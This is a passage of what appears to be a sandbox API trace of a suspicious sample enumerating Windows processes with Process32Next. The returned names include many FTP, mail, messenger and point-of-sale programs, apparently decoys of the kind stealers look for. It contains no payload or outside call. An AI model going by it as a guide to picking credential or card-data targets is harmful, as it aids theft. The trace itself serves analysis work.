| out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.228] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.232] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.233] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.235] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.236] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.237] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.239] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.240] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.241] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.243] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.244] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0265.265] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0265.268] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.270] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.272] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0265.274] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0265.300] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0265.302] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0265.304] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.306] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0265.312] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0265.314] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0265.316] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0265.318] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0265.320] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0265.326] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0265.329] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0265.331] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0265.333] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0265.335] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0265.337] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0265.391] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0265.393] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0265.395] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0265.398] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0265.400] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0265.405] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0265.406] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0265.408] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0265.409] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0265.410] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0265.412] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0265.413] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0265.415] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0265.416] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0265.418] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0265.421] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0265.423] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0265.425] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0265.427] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0265.429] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0265.430] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0265.529] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0265.531] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0265.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0265.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0265.537] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0265.538] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0265.540] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0265.542] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0265.543] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0265.545] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0265.547] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0265.549] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0265.551] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0265.553] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0265.555] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0265.557] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0265.559] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0265.560] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0265.562] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0265.564] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0265.565] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0265.567] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0265.568] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0265.570] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0265.571] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0265.589] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0265.591] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0265.593] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0265.594] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0265.596] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0265.597] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0265.599] 